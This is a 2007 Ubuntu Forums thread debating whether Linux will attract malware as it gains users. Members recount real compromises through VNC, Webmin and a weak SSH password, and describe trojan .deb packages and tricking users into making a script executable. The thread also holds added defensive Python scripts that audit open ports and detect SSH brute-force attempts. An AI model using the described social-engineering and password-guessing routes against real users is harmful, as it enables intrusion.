January 23rd, 2007, 02:30 PM
I've already worked out a way Ubuntu could be hit by an attack. Obviously I'm not irresponsible enough to come on here and say it though. As long as users are stupid or naive, any o/s is vulnerable, even Linux. The fact that many Linux users don't have their guard up makes it even easier for people who would want to attack. IMO it's not 'if' but 'when'. Sorry if this sounds bad but most virus writers are out to prove a point and the fact that many linux users say so much about Linux being virus free obviously makes Linux a target/challenge for them. I don't think the whole permission based file system thing will protect against people who want to hack it.
dbott67
January 23rd, 2007, 02:31 PM
this is sort of on topic so one more question-
I kind of assumed these were a given for any OS
but why is it that I see all over the place people not worried in the least about the other methods and never having a problem apparently running unprotected for years and I've been going almost a year on 3 comps with no trace of spyware or anything else for that matter.
I'm not trying to discredit your answer, I want your opinion, it just seems maybe you were really lucky with windows and really unlucky with linux judging by most everyone else's experience.
I would suspect that most "average" Ubuntu users do not enable any sort of external access (ssh, vnc, etc.) or unneeded services (apache, webmin, sendmail, ISPconfig, etc.) that are bigger targets for exploit scanners. If they are behind a NAT router, their existence is virtually invisible to port scanners, and most viruses & malware are not written for Linux users.
As for whether I was lucky with Windows & unlucky with Ubuntu, I don't think it was a luck factor in my case.
A little background first, though:
I am an IT professional for the past 15 years or so, so I'm not an "average" user. I like to explore, test, tweak and install new packages. I love networking computers together and accessing them remotely using all sorts of tools (ssh, vnc, ftp, scp, samba, etc.). Virtually all of the desktop machines I have been responsible for have been Windows (from 3.1 through XP), so my experience and expertise is far greater in this area than in Linux or OSX, for example. On the server side, I've run Netware, NT4, 2000, 2003, RHEL and AIX, but as these are production servers, they only run necessary services.
When I finally decided to only use Linux on my home PC, I needed applications to replace some of the ones I used in Windows (pcAnywhere, UltraVNC) that permitted me to have remote access to and from work. I also used my home machine to test out various applications and services.
The most recent hack I suffered was an oversight by the developers who maintain VNC in Ubuntu. The vulnerability was found (and fixed) in May of 2006, but the maintainers failed to update the package in the repos for over 6 months. Had the vulnerability existed in the Windows-version of VNC (it didn't), I would've been bitten on my laptop as well.
The previous hack was my own fault. Again, I was looking at other options to some of the software I use at work (IIS, e-mail, DNS, firewall, squid, etc) and installed the packages on my home computer so that I could play around with them. I had also discovered a couple of graphical admin packages (webmin and ISPConfig) that allowed easy remote administration. I enabled access to the admin tools from the external interface of my NAT router so that I could fiddle with it at work. After messing around with it for a few days, I did not disable external access to it (nor did I ensure that the packages were up-to-date... I just kinda forgot about it).
As with most exploits, it is only a matter of time before some script kiddie comes along and scans your machine for a specific vulnerability and I got hit. Like I said, I'm not sure which one specifically bit me but I'm pretty sure it was webmin (http://www.saintcorporation.com/cgi-bin/demo_tut.pl?tutorial_name=Webmin_vulnerabilities.html&fact_color=&tag= and http://www.fduran.com/wordpress/?p=33)
I guess the issue with Ubuntu (specifically for the newbie) is the reliance on the repos to maintain the most up-to-date packages. In the case of VNC, the package in the repos was not up-to-date and I got burned. I take some of the responsibility myself, as I know the repercussions of exposing a machine to the internet (and port-forwarding, etc.). The other issue is for the more adventurous sort (like me) who occasionally compile from source and fail to keep the package updated (i.e. webmin).
It's a lesson learned (the hard way) but it just goes to show that an OS is only as strong as its weakest application or dumbest user.
-Dave
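An added example (not code from this thread) of the check behind "turn off all unnecessary services": it reads `ss -tlnp` output and reports listeners bound to non-loopback addresses on ports nobody signed off on. The sample output, process names and the `expected_ports` allow-list are constructed assumptions; 5900 and 10000 are the default VNC and Webmin ports.

```python
import ipaddress
import re

# Constructed sample of `ss -tlnp` output; process names and PIDs are made up.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=812,fd=3))
LISTEN 0      4096   127.0.0.53%lo:53         0.0.0.0:*     users:(("systemd-resolve",pid=600,fd=14))
LISTEN 0      128        127.0.0.1:631        0.0.0.0:*     users:(("cupsd",pid=701,fd=7))
LISTEN 0      5                  *:5900             *:*     users:(("vncserver",pid=1500,fd=12))
LISTEN 0      128          0.0.0.0:10000      0.0.0.0:*     users:(("miniserv.pl",pid=2044,fd=5))
LISTEN 0      128             [::]:22            [::]:*     users:(("sshd",pid=812,fd=4))
LISTEN 0      128            [::1]:631           [::]:*     users:(("cupsd",pid=701,fd=6))
"""

# First quoted name inside the users:(("name",pid=...)) column.
PROC = re.compile(r'\(\("([^"]+)"')


def reachable(host):
    """True when a listener bound to `host` accepts non-local connections."""
    host = host.split("%")[0].strip("[]")   # drop %iface scope and IPv6 brackets
    if host == "*":                         # ss prints * for a wildcard bind
        return True
    return not ipaddress.ip_address(host).is_loopback


def audit(ss_output, expected_ports):
    """Return sorted (port, process) pairs for exposed, unexpected listeners."""
    found = set()
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue                        # header line or non-listening socket
        host, _, port = fields[3].rpartition(":")
        proc = PROC.search(line)
        if reachable(host) and int(port) not in expected_ports:
            found.add((int(port), proc.group(1) if proc else "?"))
    return sorted(found)


if __name__ == "__main__":
    # Assumption: SSH on port 22 is the only service meant to be reachable.
    for port, proc in audit(SAMPLE_SS, expected_ports={22}):
        print(f"port {port} ({proc}) is listening on a non-loopback address")
```

A listener that passes this check can still be exposed later by a port-forward on the NAT router, so the router's forwarding table needs the same review.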
darrenm
January 23rd, 2007, 04:00 PM
I got hacked once because I had a brain drain and set a test user up with the same username and password while having SSH set up. 1 dictionary SSH login attack later and someone was using my mail server to send spam. I should have known better and anyone who enables SSHd should know this stuff too. Ubuntu doesn't have anything running (listening) by default on a standard install so nothing to attack or compromise. Of course the kernel will respond to ICMP echo requests as standard but most people are behind NAT routers now.
To dbott67 ^ Have you tried NX?
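An added example (not part of the original posts): the dictionary attack described above leaves a recognizable pattern in sshd's auth log, many failed logins from one address and, in the bad case, an accepted login right after. The log lines are constructed in OpenSSH's syslog format, and the threshold of 5 failures is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample in OpenSSH's syslog format; addresses come from the
# documentation ranges and the usernames are made up.
SAMPLE_LOG = """\
Jan 23 03:12:01 box sshd[4101]: Failed password for root from 203.0.113.7 port 40110 ssh2
Jan 23 03:12:03 box sshd[4103]: Failed password for invalid user admin from 203.0.113.7 port 40112 ssh2
Jan 23 03:12:05 box sshd[4105]: Failed password for invalid user guest from 203.0.113.7 port 40114 ssh2
Jan 23 03:12:07 box sshd[4107]: Failed password for invalid user oracle from 203.0.113.7 port 40116 ssh2
Jan 23 03:12:09 box sshd[4109]: Failed password for invalid user user from 203.0.113.7 port 40118 ssh2
Jan 23 03:12:11 box sshd[4111]: Accepted password for test from 203.0.113.7 port 40120 ssh2
Jan 23 08:30:15 box sshd[5200]: Failed password for alice from 198.51.100.20 port 51515 ssh2
Jan 23 08:30:21 box sshd[5200]: Accepted password for alice from 198.51.100.20 port 51515 ssh2
Jan 23 09:01:00 box sshd[5300]: Accepted publickey for alice from 198.51.100.20 port 51600 ssh2
"""

# Matches both "Failed password for invalid user X from IP" and
# "Accepted <method> for X from IP".
EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) \S+ for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def find_guessing(log_text, threshold=5):
    """Return {ip: report} for sources with at least `threshold` failed logins.

    report["accepted_after"] lists accounts that logged in from that source
    once the threshold had been reached, i.e. guesses that probably worked.
    """
    failed = defaultdict(list)     # ip -> usernames that failed, in log order
    broke_in = defaultdict(list)   # ip -> accounts accepted after the threshold
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if m is None:
            continue
        ip, user = m.group("ip"), m.group("user")
        if m.group("result") == "Failed":
            failed[ip].append(user)
        elif len(failed[ip]) >= threshold:
            broke_in[ip].append(user)
    return {
        ip: {
            "failures": len(users),
            "usernames": sorted(set(users)),
            "accepted_after": broke_in[ip],
        }
        for ip, users in failed.items()
        if len(users) >= threshold
    }


if __name__ == "__main__":
    for ip, report in find_guessing(SAMPLE_LOG).items():
        print(ip, report)
```

A single mistyped password followed by a normal login, as from 198.51.100.20 in the sample, stays below the threshold and is not reported.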
loserboy
January 23rd, 2007, 04:06 PM
well that sheds a lot of light on it for me, thanks for the follow up.
I'm only a semi-tone step above the "average" user so for some time to come I won't be using software like ssh, vnc, apache, webmin, sendmail, or ISPconfig. although maybe i should review my port forwarding setup, otherwise i'm feeling much more comfortable than when I 1st opened my mouth.
dbott67
January 23rd, 2007, 05:29 PM
To dbott67 ^ Have you tried NX?
Thanks for the tip, Darren.
I just took a look at nomachine.com and took a testdrive. Pretty slick.
Is there a package in the repositories? I just did a quick search of the forums and see a few howtos on freenx. Are there any that you recommend? I'm running Dapper. I've found this one & will try it out later:
http://www.ubuntuforums.org/showthread.php?t=241651&highlight=freenx+dapper
Thanks,
Dave
Quillz
January 23rd, 2007, 05:36 PM
Well, it's hardly a surprise that even casual internet browsing is likely to earn a few sneaky things with IE, as well as the everpresent threat of vira.
I know that Linux is considerably more safe, but being the n00b I am, I'm not sure entirely why.. except that more vira is targeted at windows.
But if the same people sat down, and decided to deliberately go after Linux machines, would it be as easy ?
Same goes for spyware ?
Please don't think that I am trolling or trying to start arguments, I'm genuinely wondering about the hows and why's of all this.
Cheers
Ivan
Considering that I used to run Windows without an anti-virus and never had a virus (although I did run regular spyware checks), I naturally am very confident that lacking both of the aforementioned will not give me any trouble in Linux.
darrenm
January 23rd, 2007, 05:46 PM
Thanks for the tip, Darren.
I just took a look at nomachine.com and took a testdrive. Pretty slick.
Is there a package in the repositories? I just did a quick search of the forums and see a few howtos on freenx. Are there any that you recommend? I'm running Dapper. I've found this one & will try it out later:
http://www.ubuntuforums.org/showthread.php?t=241651&highlight=freenx+dapper
Thanks,
Dave
I used to use VNC but found it a bit too bandwidth heavy.
I just download the 3 packages from www.nomachine.com - Free Linux server, NXNode and NXclient for Debian/Ubuntu and install.
Make sure your sshd_config has the authorized_keys file set to ~/authorized_keys2 and restart SSH and it just works over port 22 forwarding and compressing X. I swear by it now.
wert613
January 23rd, 2007, 05:49 PM
the title says nothing about macintosh...
dbott67
January 24th, 2007, 10:28 AM
Thanks, Darren.
I installed NoMachine last night and played around with it at home and it seems very fast. This morning when I got to work, I remotely logged in and it was FAR faster than VNC. You sold me!
I guess the only downside is that you can't connect directly to the console (i.e. session:0 --- the active desktop). I can log in to "my" desktop using my login credentials, but I guess it's just a virtual desktop.
Anyhow, thanks again.
-Dave
TheWizzard
January 25th, 2007, 05:11 PM
the title says nothing about macintosh...
why should it?
tito2502
January 25th, 2007, 05:16 PM
The wider user base theory is nonsense, for a large part.
It probably makes some difference, but Linux is inherently more secure.
If i were a malicious programmer, I would want to hit the servers. Most servers run Linux, so I'd target Linux; yet we don't hear about Linux server malware.
Jonne
January 25th, 2007, 06:04 PM
Plenty of Linux servers get rooted. Usually because of a hole in a php package, combined with a not-so secure setup (because of inexperience).
The problem isn't as bad as with Windows botnets, but for every operating system you should take the same basic security precautions (turn off unnecessary services, pick a secure password, use a NAT router and/or firewall, keep your OS updated, and don't run apps from untrusted sources (!) ).
I manage to keep my windows box at work clean this way, even though I run as admin (yes, I know I shouldn't), and without an antivirus that's worth anything.
sgbeamer
February 8th, 2007, 04:48 PM
There is an excellent article on why linux/unix is less susceptible to malware at The Register
http://www.theregister.co.uk/security/security_report_windows_vs_linux/
Here is an excerpt:
Many, if not most of the viruses, Trojans, worms and other malware that infect Windows machines do so through vulnerabilities in Microsoft Outlook and Internet Explorer. To put the question another way, given the same type of desktop software on Linux (the most often used web browsers, email, word processors, etc.), Are there as many security vulnerabilities on Linux as Windows?
Windows Design
Viruses, Trojans and other malware make it onto Windows desktops for a number of reasons familiar to Windows and foreign to Linux:
Windows has only recently evolved from a single-user design to a multi-user model
Windows is monolithic, not modular, by design
Windows depends too heavily on an RPC model
Windows focuses on its familiar graphical desktop interface
Linux Design
According to the Summer 2004 Evans Data Linux Developers Survey, 93% of Linux developers have experienced two or fewer incidents where a Linux machine was compromised. Eighty-seven percent had experienced only one such incident, and 78% have never had a cracker break into a Linux machine. In the few cases where intruders succeeded, the primary cause was inadequately configured security settings.
More relevant to this discussion, however, is the fact that 92% of those surveyed have never experienced a virus, Trojan, or other malware infection on Linux.
Viruses, Trojans and other malware rarely, if ever, manage to infect Linux systems, in part because:
Linux is based on a long history of well fleshed-out multi-user design
Linux is mostly modular by design
Linux does not depend upon RPC to function, and services are usually configured not to use RPC by default
Linux servers are ideal for headless non-local administration
Keep in mind when reading the summaries below that there are variations in the default configurations of the different distributions of Linux, so what may be true of Red Hat Linux may not be true of Debian and there may be even more differences in SuSE. For the most part, all the major Linux distributions tend to follow sane guidelines in the default configurations.
ashmew2
February 20th, 2007, 06:08 AM
Hi every1 , I thought that i would put this question out to u as its been bothering me for some time now.
We all know that there is not a real virus threat to Ubuntu Right now but what if somehow (although in due course of time , this WILL happen) 99% of Windows Users switched to Ubuntu and Ubuntu will be then as famous and widespread as windows is now. But then wouldnt system pirates create viruses towards the Ubuntu Operating System ??
Then what will we do ? The same old virus problems again and again as i used to face in windows ?!!
Do post your reply!!
3rdalbum
February 20th, 2007, 06:29 AM
This is an old, old topic for discussion, and I wouldn't be surprised if someone locks the thread. The answer is, Linux is more secure by design, and when security flaws are discovered, they are fixed very quickly. It's harder to write a spreadable virus for Linux than it is for Windows.
Check out this website for more information: http://linuxmafia.com/~rick/skoll/anti-virus.php
hoagie
February 20th, 2007, 06:46 AM
Let me ask a question. You think that there are no viruses in Linux because it's not that widely used all over the world like windows is on the desktops. Think again, most of the websites on the internet are hosted on servers that run linux but how many of them get infected? :confused:
Redlance
February 20th, 2007, 07:20 AM
one thing ashmew2 forgets to realize there are many flavors and variants to linux.
writing a virus that could infect a different type of linux (BSD,Debian,Gentoo,Slack)
would be hard and very bulky. and as someone has already mentioned serious flaws when found are fixed very fast.
with all the variants out there any future virus writers i wish em luck. Not impossible but seriously a monumental task.
ashmew2
February 20th, 2007, 09:37 AM
hmmmm , thanks for the replies , most of my worries are sorted out now :D
Jussi Kukkonen
February 20th, 2007, 09:57 AM
hmmmm , thanks for the replies , most of my worries are sorted out now :D
No need to start sweating again, but I think it needs to be said that if linux was used in over 50% of machines, there would most certainly be a lot of viruses written for linux. It is another question how successful they'd be -- I agree with the other posters that problems quite probably would not be as severe as they are with Windows.
Monoculture is bad in many ways, and computer security is a good example...
vinboy
February 20th, 2007, 10:15 AM
Microsoft Windows has so much fast-spreading virus is because of the OS's running service.
Windows OS itself open up many ways for virus to get in.
In the linux world, a desktop linux OS usually don't have so many services built in, thus prevent fast spreading virus.
of coz, you can still get infection on linux, but not the fastspread one.
By fastspread I mean the ease of getting an infection. I remember I caught a virus by just connecting to the internet. I didn't have to run any program, the virus just got its way into Windows XP by some holes. I had to manually patch the system to fix the hole.
So, there will be viruses for Linux, but won't get it as easy as windows.
For example, maybe someone sent you a file and you run it and it turn out to be a virus. In this case it is passive infection.
In the former windows case, it is an active infection, where you didn't have to do anything to get infected.
the_darkside_986
February 20th, 2007, 10:18 AM
One great strength of the distro variety is that all the gnome login screens seem to look different. So there goes any hope of writing a spoofed login screen app. But some PC users are so incompetent that they might think, "Oh how neat, my login screen has a new color and font and theme," and then they type their password into it.
shining
February 20th, 2007, 02:38 PM
Let me ask a question. You think that there are no viruses in Linux because it's not that widely used all over the world like windows is on the desktops. Think again, most of the websites on the internet are hosted on servers that run linux but how many of them get infected? :confused:
Is it really possible to compare a server set up by a linux admin, with a desktop used by the average windows user? I'm not sure..
Now, if for example 50 % of windows servers were successfully attacked, and only 1% of linux servers were, maybe that would be more interesting. It could still only mean that linux admins are more skilled than windows ones, but at least it would be comparable.
If the majority of desktops were on Linux, and plenty of people used them only as root, doing crazy things, and not paying any attention at all, I don't think it would work very well.
Maybe in the case of an ideal perfectly secure os, the system would always be perfectly secure, no matter which user is running it, but I doubt it's the case.
aysiu
February 20th, 2007, 02:51 PM
You may be interested in reading some of the posts in the thread I just merged yours with.
tuku
April 16th, 2007, 06:35 PM
I use Ubuntu on my home computer fully. No dual booting etc. Everything that I used to do in XP (2 years back), I can do in Ubuntu.
But I think here is what will happen if Linux comes preinstalled on Dells, HP etc.
People with no knowledge of security (firewalls etc) will start using Linux. As a result, people will start making packages that will compromise the security of linux (adwares spywares).
It's very easy to lure an average user to download and run this rpm or dpkg package that promise to give a nice screen saver or hints on saving tons of money on air travel. The install script will ask the user to enter the root password. Once the script has the root password, the possibilities are endless- The script can do all that windows adware and spywares can do on a linux system.
So if linux becomes mainstream, there will be a lot of viruses, adwares and spywares that will attack linux. There will be paid antiviruses for linux and proprietary applications that need to be bought just to do basic tasks.
Sorry.. but I like Linux the way it is and want the average user to think it's only for hackers or people who like to use the command prompt. I want to keep linux our "little secret"
jfinkels
April 16th, 2007, 06:37 PM
[...]
It's very easy to lure an average user to download and run this rpm or dpkg package that promise to give a nice screen saver or hints on saving tons of money on air travel.
[...]
Who doesn't enjoy a nice screensaver or saving money on air travel?
SnTholiday
April 16th, 2007, 07:17 PM
You have nothing to worry about.
aysiu
April 16th, 2007, 07:20 PM
With centralized, trusted repositories, I don't see what the problem is. So other people will download sketchy .deb files. I won't. So others will give away their passwords to escalate permissions for sketch .deb files. I won't.
As long as you stick to the Ubuntu repositories, you'll be fine, even if everyone's using Ubuntu or some Linux distro.
NeoLithium
April 16th, 2007, 07:27 PM
Quite true; there are just as many Linux warnings to watch repositories as there are for Microsoft products to watch what you download for .exe files. It's simple common sense to know where you're downloading from. Call me crazy, but I think it's not hard to grasp the concept of using an Ubuntu repo above bob'swarezemporium.ripoff. It's like all things. Practice makes it better, and people need to give Linux a chance to get comfortable with it. We're not back in the mid 80s where you need a degree :)
jrusso2
April 16th, 2007, 09:19 PM
I use Ubuntu on my home computer fully. No dual booting etc. Everything that I used to do in XP (2 years back), I can do in Ubuntu.
But I think here is what will happen if Linux comes preinstalled on Dells, HP etc.
People with no knowledge of security (firewalls etc) will start using Linux. As a result, people will start making packages that will compromise the security of Linux (adware, spyware).
It's very easy to lure an average user to download and run this rpm or dpkg package that promises to give a nice screen saver or hints on saving tons of money on air travel. The install script will ask the user to enter the root password. Once the script has the root password, the possibilities are endless. The script can do all that Windows adware and spyware can do on a Linux system.
So if Linux becomes mainstream, there will be a lot of viruses, adware and spyware that will attack Linux. There will be paid antiviruses for Linux and proprietary applications that need to be bought just to do basic tasks.
Sorry.. but I like Linux the way it is and want the average user to think it's only for hackers or people who like to use the command prompt. I want to keep Linux our "little secret".
Blah Blah, been hearing this for the last ten years. If the "regular" user gets a hold of Linux it will become stupid, dumbed down, not 133t, and full of viri.
I have been using it for 11 years and it keeps getting slowly better.
vivin_west
April 17th, 2007, 02:56 AM
can anyone tell me how a virus works?
Soldierboy
April 17th, 2007, 06:50 AM
To seriously think that adware, spyware, virii and the like will NOT come to Linux when and if the majority of computer users come to Linux, then you are lying to yourself, plain and simple. We can boast Linux security all we want to, but programmers will just find a way to circumvent it. It's a cat and mouse game that has been happening on Windows for a long time. Anyways, I agree, I would rather my Linux stayed low-profile, and if the day ever does come that this is no longer so, I will find something else that is low-profile.
Adamant1988
April 17th, 2007, 07:16 AM
To seriously think that adware, spyware, virii and the like will NOT come to Linux when and if the majority of computer users come to Linux, then you are lying to yourself, plain and simple. We can boast Linux security all we want to, but programmers will just find a way to circumvent it. It's a cat and mouse game that has been happening on Windows for a long time. Anyways, I agree, I would rather my Linux stayed low-profile, and if the day ever does come that this is no longer so, I will find something else that is low-profile.
They will be a different flavor, and besides, I don't want Windows ousted. Let Microsoft have 80% of the home user market, Linux can have the enterprise, and Apple and the various distributions can divvy up the 20% of the home user market.
aysiu
April 17th, 2007, 12:13 PM
There's a big difference between saying Linux will become a target of malware of various kinds and saying that Linux is just as susceptible as Windows is to automatically-propagating malware.
Yes, someone can create a .deb that, if I'm dumb enough to double-click it and give my password to it, can wreak havoc on my system. But isn't it a lot more difficult to have something install without the user's consent and turn the computer into a spam zombie?
hardyn
April 17th, 2007, 12:32 PM
can anyone tell me how a virus works?
there are lots of different modes of attack for "viruses"
trojans are the most simple - you let them in, hence the trojan analogy.
some attach and modify system files.
some modify the interrupt jump table.
some run a process or a service.
...
...
that's what makes them so amazing... there is no one way to write a virus. the U of Calgary in Alberta Canada has a graduate course (maybe undergrad too?) on the writing of viruses.
karellen
April 17th, 2007, 01:37 PM
Who doesn't enjoy a nice screensaver or saving money on air travel?
:lolflag:
Hex_Mandos
April 17th, 2007, 01:51 PM
I don't want Linux in every desktop either. But I'd really like 10 to 20% of desktops being Linux. That way we wouldn't be ignored by ISVs any longer, and Windows' reduced desktop share would mean that writing malware would be a less useful activity: if Linux had 20% of desktops and Macs maybe 30%, any one piece of malware would be able to affect only half of all desktops in the world (instead of 90+% like today).
ThinkBuntu
April 17th, 2007, 02:39 PM
As long as it's free, I could care less. The more people who use it, the more support there is. The fact that root passwords, etc. would be required puts it on the same security level (if not higher) than Mac OS, and miles ahead of Windows. And it would be nice if we started seeing software built for Linux, even if it costs money. The same goes for hardware drivers and the like.
igknighted
April 17th, 2007, 02:58 PM
As long as it's free, I could care less. The more people who use it, the more support there is. The fact that root passwords, etc. would be required puts it on the same security level (if not higher) than Mac OS, and miles ahead of Windows. And it would be nice if we started seeing software built for Linux, even if it costs money. The same goes for hardware drivers and the like.
I don't really agree with this... because think of who supports the user influx and who pays for it... we do. I don't have any needs (hardware support or software desired) that are unfulfilled, so a huge new-user influx will only strain the community and bring more corporations into the fold who want to make money off of what is more a cultural movement right now than anything else. Look at what happened to punk rock when the record companies moved in with all their money... I see this as a very real threat, so in many ways I don't want to see Linux on everyone's desktop.
I don't mean to say I don't want new users... I think that anyone who, with clear intentions, wants to learn Linux should get the full support of the community, because it isn't for us to hoard, but it is to be enjoyed, not just used.
ThinkBuntu
April 17th, 2007, 03:07 PM
I don't really agree with this... because think of who supports the user influx and who pays for it... we do. I don't have any needs (hardware support or software desired) that are unfulfilled, so a huge new-user influx will only strain the community and bring more corporations into the fold who want to make money off of what is more a cultural movement right now than anything else. Look at what happened to punk rock when the record companies moved in with all their money... I see this as a very real threat, so in many ways I don't want to see Linux on everyone's desktop.
I don't mean to say I don't want new users... I think that anyone who, with clear intentions, wants to learn Linux should get the full support of the community, because it isn't for us to hoard, but it is to be enjoyed, not just used.
I was once a new user, and every day I learn more. Maybe that's just because I'm very interested, but I imagine that, just as there is plenty of free Windows support via forums, Linux would remain the same. Also, unlike Punk Rock, Linux can always fork...and fork...and fork...When all you depend on is a kernel and some base packages, it's pretty easy to remain a community movement.
UbuntuniX
April 17th, 2007, 03:07 PM
I hope Linux never becomes mainstream.
Most distros probably never will be, but Ubuntu, in all its popularity, will gain a high percentage of usage...
The same can be said for many things.
"Outcasted" cultures and such can be great, but once (and if) they become mainstream, they'll never be the same.
Take skateboarding:
Many of us prefer it when it is dead, because only the TRUE skaters are with us, maybe with the exception of a few.
When skateboarding gains popularity, as it usually does at stages, at least 90% of skaters are "fake", only doing it because they think it's "cool", and will likely quit when it begins to die again.
Similar things can be said for Linux, though this is potentially worse, as there is also the problem of security and such.
Hex_Mandos
April 17th, 2007, 04:13 PM
I disagree with the idea that Linux becoming mainstream would kill the community. Thing is, "Linux" will never become mainstream. Maybe a few distros will (those which fit a market niche such as being decent desktop OSes), but does anyone think that Gentoo will ever be dominant among regular users? Slackware? LFS? There'll always be a place for community Linux, as long as it remains free as in freedom.
nenyalorien
April 18th, 2007, 10:52 AM
to be honest, i am a nonconformist too, allergic to crowd mentality. i understand the analogy of music being hijacked to Capitalist Island happening to Linux, but I believe it's not fair to deprive the rest of the world of decent OS's. i have had hell with Micro$oft's OS's, and i honestly do not wish my anguish on anyone. my friends are experiencing meltdowns with Window$ too, and i try to help them by nudging them in the direction of Mac or Open Source. it's not about being cool or whatever at all. it's people's sanity and data at stake. i think this exclusivity mentality will defeat the purpose of beautifully written code and secure systems. i believe that if Linux remains to be a geek's OS, it will only die, for lack of propagation. maybe developers will want to expand it for the sheer love of the code. but what would it seek to accomplish? anything that doesn't have a purpose dies a natural death. i hope the Linux community will understand that it's not about the pursuit of exclusivity that matters, but it should be alleviating the suffering of peers. above anything in life, i believe that this should be one's foremost purpose. maybe then we'll see the better world we're whining to have. :p
aysiu
April 18th, 2007, 11:06 AM
The more graphical frontends we have for configuring things like /etc/X11/xorg.conf or /etc/fstab, the less relevant file/folder hierarchy is. This is really only an issue because sometimes people still have to go into the guts of the operating system.
eentonig
April 18th, 2007, 11:23 AM
When Linux (whatever distro) reaches that 80% marketshare milestone :mrgreen:, I'm sure the world will be flooded with Linux viruses.
But I'm 100% convinced that 99% of the current users won't be impacted by it. That is, as long as you stay with trusted repositories, viruses won't have a chance to infest your machine. No distro will risk the shame of being the first to push a virus in its repositories. So all packages that they enter in there will be double-checked.
But, if you install dubious software as root.... you deserve the ****.
I ran my XP behind a NAT and without any virus scanners or firewall enabled. Never had a problem. But I was also smart enough to download any risky software while at work. Their FWs and virus scanners were much better to intercept anything spooky.
As for Linux. I don't even need the NAT anymore (besides for sharing my internet of course), so I have a NAT rule in my router to forward all unmatched packets to my main Linux machine. Not safe :mrgreen:, but as my machine doesn't have any 'unknown' open ports, it can't do any harm. And if I do open a port, it's up to me to be sure that I keep my box safe.
Shay Stephens
April 18th, 2007, 11:49 AM
Sorry.. but I like Linux the way it is and want the average user to think it's only for hackers or people who like to use the command prompt. I want to keep Linux our "little secret".
That is really selfish and not at all in the spirit of Ubuntu.
As far as viruses and such, I used to think it was simply a matter of Linux being overlooked. But really it does come down to the architecture of the OS. I do not fear that Linux, Mac, or the BSD's will be the breeding ground for malware and the like the way Windows is.
jdhore
April 19th, 2007, 12:57 PM
As we all know, 80-90% of home users use Windows and about 99.9% of all viruses are Windows only and Windows is the only OS that can get spyware (basically) and this is mainly because virus writers/spyware writers/etc focus on Windows because it's the most popular OS. Now, assume in 2 years, 25-50% of home computer users have moved over to Linux, do you guys think it will start to suffer the same flaws as windows with tons of exploits, virii, spyware, extremely bloated code, etc?
lakersforce
April 19th, 2007, 01:02 PM
I am afraid that it will be a reality, should Ubuntu get sufficiently popular.
aysiu
April 19th, 2007, 01:12 PM
Read any three pages of the thread I merged you with. You'll find you're partially correct.
ciaran.mooney
April 19th, 2007, 01:14 PM
Though I can see it being less of a problem if it did happen.
Microsoft only has its employees to fix code. Linux/Ubuntu has 1000s of volunteers and companies that have access to the source code and expertise to solve these problems very quickly.
I would imagine any virus or vulnerability that gets exploited will be fixed a lot quicker in Linux/Ubuntu than it ever could with Microsoft.
BrokeBody
April 19th, 2007, 01:22 PM
assume in 2 years, 25-50% of home computer users have moved over to Linux, do you guys think it will start to suffer the same flaws as windows with tons of exploits, virii, spyware, extremely bloated code, etc?
No. Simply because of the philosophy of Linux protection. If you are really interested, read something about cron and init for a start. ;) Also, if you have some virus on your computer, you will have to be logged in as root so you could run it, just like any other executable.
dbott67
April 19th, 2007, 01:55 PM
No. Simply because of the philosophy of Linux protection. If you are really interested, read something about cron and init for a start. ;) Also, if you have some virus on your computer, you will have to be logged in as root so you could run it, just like any other executable.
How so? I can run most any application without being root --- the file just needs to be marked as executable.
People running linux may not be able to infect themselves using the traditional methods like e-mailed viruses (opening unsolicited attachments and what-not) but once linux gains enough of a foot-hold, hackers will target linux using all sorts of methods:
- untrusted repositories / installation sources
- bundling scumware with desired software
- improperly secured computers running unneeded services
- unpatched computers running packages with vulnerabilities
- brute-force cracking or running services
Bad guys don't want to damage your computer any more; they want to own it. They want your data, your processing power and the ability to blast spam and other crap from your machine.
-Dave
igknighted
April 19th, 2007, 02:03 PM
Linux? Perhaps. Linux is developing so fast that there is not enough code review at the moment. So in this regard, there could be exploits. BSD on the other hand (not counting that fringe child OS X... I don't trust its security... they are the ones that truly benefit from small market share in a security sense) has excellent code review and releases (IMO) a far more secure product. This is at the risk of slowing development, but worth it for many.
Back to the point, linux security will never be as bad as MS. Think of all the high-profile servers that run linux... if they were vulnerable they would be under attack more. Almost every attack you hear about on a linux server was the fault of some idiot tech who made a password like "bob" and it was broken... surprise!!! So clearly it is not all about market share.
BrokeBody
April 19th, 2007, 02:57 PM
How so? I can run most any application without being root --- the file just needs to be marked as executable.
Every unknown application under Linux is not marked as executable dude! ](*,)
I thought we've learned that already. :roll:
:rolleyes:
The protection logics (algorithms) under Linux is simply different. It doesn't go just like that.
btw, I see that you didn't read anything about cron and init. :D When you read that, you'll see what I'm talking about. ;)
dbott67
April 19th, 2007, 03:55 PM
Every unknown application under Linux is not marked as executable dude! ](*,)
I thought we've learned that already. :roll:
- What if it's downloaded from a repository (untrusted (http://www.flickr.com/photos/trevi55/296804891/)* or not)?
- What if some guy creates a .deb file and hosts it on their server for everyone to download and install (ever use Automatix (http://www.getautomatix.com/wiki/index.php?title=Installation#Ubuntu_7.04_.28Feisty_i386.29)?)
- What if somebody sends a gullible person a script and says, oh yeah, before it'll run you need to:
chmod +x naked-pics-of-britney.sh
- What if the hacker enters via any number of other ways and marks it as executable themselves?
- What if a buffer overflow (http://www.securityfocus.com/bid/22771/discuss) in some desktop applications that can run arbitrary code
* the above link shows a prank that some guy played on a bunch of Ubuntu users who used Trevino's repo to install Beryl. You might be smart enough not to eat yellow snow, but there are plenty of users who don't have a clue and will do whatever they're told --- it's lemon-flavoured, I promise!
Ubuntu had an unpatched VNC vulnerability (https://bugs.launchpad.net/ubuntu/+source/vnc4/+bug/77383) for 8 months (discovered in May 2006, not patched until January 2007)! No need to hack... hell, the bad guys could connect without needing a password! Add to that all of the various PHP, SQL and other applications and services that someone might be running and you have a number of ways that your system could be compromised.
btw, I see that you didn't read anything about cron and init. :D When you read that, you'll see what I'm talking about. ;)
Why don't you enlighten us? Provide a link to what the heck you're talking about.
